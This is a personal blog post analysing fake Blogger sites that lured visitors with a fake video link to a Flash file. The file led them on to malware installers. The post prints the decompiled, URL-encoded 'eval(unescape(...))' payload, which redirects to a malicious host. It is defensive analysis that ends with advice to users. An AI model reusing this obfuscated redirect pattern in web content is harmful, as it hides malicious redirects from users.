Nasty blog, scary flash, why are you attacking me?

Yesterday I noticed that all of a sudden no less then 6 new sites linked to this small-time blog. Great huh? Except when checking out those blogs (all on google’s blogger-platform by the way), I quickly saw they were fake, attempting to trick users into installing malware on their windows PC’s.
Being the curious would-be hacker I am, I took the plunge to see how these guys go about trying to infect careless users;

  1. the blogpost contains what seems to be a youtube movie, but which actually is just a animated gif with a link behind it
  2. when clicking “the movie” to play, a swf-file is downloaded (blog.swf)
  3. that blog.swf (which i downloaded on my linux-box and decompiled on the commandline using flare) contains this simple code:
    • this.getURL(‘javascript:eval(unescape(‘%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B’))’);
    • which translates roughtly into go to
  4. and that URL then takes you for a rollercoaster ride, going through several redirector-sites before arriving on a dark corner of the web where you’re told to install an activeX-component to watch a movie or a codec or sometimes even be told (the irony) to install antivirus software from some unknown company.

Some lessons learned;

  • Flash is evil (or it can be) as it allows attackers to hide malicious code inside a nice looking (and binary) swf-file.
  • Don’t trust the incoming links functionality google’s blogsearch provides (i switched back to technorati for the ‘binnenkomers’-widget on my blog)
  • The ‘report web forgery‘ function in Firefox (under ‘help’) works great. Use it!